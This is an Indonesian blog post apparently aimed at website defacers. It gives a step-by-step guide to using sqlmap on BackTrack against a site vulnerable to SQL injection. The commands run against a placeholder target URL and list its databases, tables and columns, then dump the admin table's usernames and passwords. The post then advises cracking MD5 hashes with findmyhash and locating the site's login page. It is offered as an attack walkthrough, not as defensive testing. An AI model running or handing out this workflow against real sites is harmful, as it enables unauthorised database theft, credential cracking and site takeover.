Cara menggunakan SQLmap di Backtrack

Hari ini mau ngeramein postingan di blog ini mengenai sqlmap di backtrack, mungkin udah pada tau bagi para defacer dengan tool ini. Tapi kagak masalah, yang penting blog saya jadi rame postingannya. Klo di backtrack tool nya ada pada di directory 

/pentest/database/sqlmap
sqlmap merupakan tool yang di buat dari bahasa python, dan sqlmap ini berfungsi untuk menginjeksi sql secara otomatis. Jika temen-temen ada yang suka maenan sql injection ala manual dan gagal bisa menggunakan tool yang satu ini. langsung saja tanpa basa basi saya akan menulis cara-cara menggunakan sqlmap ini.


Diatas ini adalah bentuk dari perintah-perintah untuk menjalankan sqlmap, anda bisa melihatnya dengan cara python sqlmap.py -h atau ./sqlmap.py -h maka anda bisa melihat format-format perintah tersebut. Dan dibawah ini adalah untuk menjalankannya,

python sqlmap.py -u http://target.site/index.php?id=9 --dbs

perintah diatas adalah untuk mencari database pada sebuah target yang memiliki celah sql injection. jika telah didapati dabatabasenya maka lanjutkan dengan perintah berikut untuk mencari sebuat table dalam database tersebut, disini saya contohnya kita mendapatkan database dengan nama "zelvacode", jadi perintah untuk mencari tables nya adalah sebagai berikut

python sqlmap.py -u http://target.site/index.php?id=9 -D zelvacode --tables

Kemudian dari perintah tersebut kita dapatkan tables dengan nama "admin" (didalam tables carilah unsur kata admin dan user karena disitulah letak informasi-informasi vital, tapi semua terserah pada seorang developer web nya mau memberikan nama apa dalam tables tersebut, jadi anda harus mencobanya satu-persatu jika nantinya anda dapatkan tanpa admin atau user).

python sqlmap.py -u http://target.site/index.php?id=9 -D zelvacode -T admin --columns

Nah kemudian didalam database zelvacode dan table admin kita mencari columns, dan kita dapatkan columns user dan passwordnya. Kita akan mencoba untuk mendumming user dan passwordnya dengan cara sebagai berikut

python sqlmap.py -u http://target.site/index.php?id=9 -D zelvacode -T admin --dump

Setelah di dump maka terlihatlah username dan passwordnya, jika passwordnya berbentuk md5 maka anda perlu mendekripnya terlebih dahulu, bisa anda gunakan findmyhash di backtrack. Jika telah ditemukan password dan username maka langkah selanjutnya adalah anda harus mencari gembok yang akan dibuka dalam hal ini adalah halaman login pada sebuah website.

Mungkin cuma ini dulu dokumentasi dari saya, beginilah bahasa saya. Mudah-mudahan yang membaca akan mengerti dengan tutorial ini.

sekian semoga Bermanfaat ~!!
Anda baru saja membaca artikel yang berkategori Hacking / Komputer dengan judul Cara menggunakan SQLmap di Backtrack. Anda bisa bookmark halaman ini dengan URL http://predator-technology.blogspot.com/2013/07/cara-menggunakan-sqlmap-di-backtrack.html. Terima kasih!
Ditulis oleh: VeRZaW#021 - 25 July 2013

Belum ada komentar untuk "Cara menggunakan SQLmap di Backtrack"

Post a Comment

Mohon Memberi Komentar dengan Kata-Kata yang Sopan !!